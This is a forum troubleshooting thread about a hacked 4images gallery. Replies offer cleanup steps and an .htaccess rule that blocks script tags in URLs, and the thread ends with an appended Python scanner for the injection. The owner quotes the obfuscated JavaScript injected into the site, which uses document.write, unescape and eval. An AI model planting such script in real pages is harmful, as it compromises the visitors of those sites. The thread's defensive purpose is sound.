4images Forum & Community
4images Issues / Ausgaben => Discussion & Troubleshooting => Topic started by: lordi on April 22, 2012, 04:18:14 PM
-
Hello
I got a message from Google Webmaster Tools saying that Google detected harmful code in my gallery.
I upgraded from 1.7.7 to 1.7.10 directly after I saw this message !!!
Well, I couldn't reach the path it gives me to remove the injection ... CAN ANYONE HELP ME PLEASE ???
code removed @Rembrandt
what shall I do to remove the harmful code ???
-
...what shall I do to remove the harmful code ???
1.) Do not log in to your FTP or web interface any longer.
2.) Check your home PC with a powerful antivirus program.
(This is very important; most Trojans on websites come from your own PC via FTP.)
3.) If your system is clean, change all your FTP and SQL passwords.
4.) Do not visit your website.
5.) Log in to your FTP and remove the code; check all your *.php and *.html files on your FTP server.
6.) Once you have done all this, visit your website and check it with the online antivirus program.
Edit: it does not matter whether it is a virus or a Trojan.
Regards, Andi
-
I did everything you said above,
but HOW DO I GET THE HARMFUL CODE OFF the FILES in the /gallery ???
I couldn't find the code in /categories.php.
Here's the error code, and believe me, it has nothing harmful in it and no link for it. Just look at it and tell me what to do:
/gallery/categories.php?cat_id=3&sessionid=1371559e943a1dbd836f4b568bd70eb2
this is what I need help with
-
Do you mean where the Trojan comes from?
Have you looked in your categories.html?
What error code, this one?
/gallery/categories.php?cat_id=3&sessionid=1371559e943a1dbd836f4b568bd70eb2
This is not an error code.
-
The suspected injected code is the following:
<script>function tRsEFox(bzrJSZR){ fff.op.replace("v");window.eval(); fff.op.replace("v"); }
var tOUU=document;document['wr1ite'.replace(/[0-9]/,'')](unescape(document.getElementById('tIz').value));function rHHBLjWHwe(KJndr){ window.eval();var vUklVhv = document.getElementById('YBI'); }
</script>
And it is injected in the following:
/gallery/categories.php?cat_id=2&sessionid=1371559e943a1dbd836f4b568bd70eb2
Please help me.
-
Hi,
It seems the JavaScript code is injected via your URL.
To avoid such harmful activities, add the following code to the .htaccess of your gallery.
It may help you in future.
# Block out any script that includes a <script> tag in URL
RewriteEngine On
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3E) [NC]
RewriteRule ^ - [F]
Br,
satz
-
SathishIPL: thank you, I just added an .htaccess and included the 2 lines you gave me.
- Now, how do I remove the current <script> code? Where do I find it specifically?
-
Hi,
I am not sure, but try looking in the templates/your templates/header.html or Footer.html files.
But it will be in .html files.
Br,
Satz
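-
The file check from Andi's step 5 and Satz's template suggestion, as an added example that is not part of any post in this thread: a Python scanner that walks a downloaded copy of the gallery and reports lines carrying markers of the snippet quoted above. The patterns, the extension list and the sample directory tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristics derived from the snippet quoted in this thread (assumptions,
# not a complete signature set for injected scripts).
PATTERNS = {
    "obfuscated document.write": re.compile(
        r"document\s*\[\s*['\"][^'\"]*['\"]\s*\.replace\("),
    "unescape of element value": re.compile(
        r"unescape\s*\(\s*document\.getElementById\("),
    "bare window.eval()": re.compile(r"window\.eval\s*\(\s*\)"),
}
EXTENSIONS = {".php", ".html", ".htm", ".js"}  # assumed file types to check


def scan_tree(root):
    """Return sorted (relative path, line number, pattern name) hits."""
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for name, rx in PATTERNS.items():
                if rx.search(line):
                    rel = path.relative_to(root).as_posix()
                    hits.append((rel, lineno, name))
    return sorted(hits)


def demo():
    """Scan a constructed sample tree: one clean PHP file, one tampered footer."""
    with tempfile.TemporaryDirectory() as tmp:
        tpl = Path(tmp, "templates", "default")
        tpl.mkdir(parents=True)
        (tpl / "header.html").write_text("<html><head></head><body>\n")
        (tpl / "footer.html").write_text(
            "</body>\n"
            "<script>var d=document;document['wr1ite'.replace(/[0-9]/,'')]"
            "(unescape(document.getElementById('x').value));</script>\n")
        Path(tmp, "categories.php").write_text("<?php echo 'ok'; ?>\n")
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, lineno, name in demo():
        print(f"{rel}:{lineno}: {name}")
```

Run `scan_tree()` against a local copy of the site fetched over FTP; a hit only marks a line for manual review, and a clean result does not prove the files are clean.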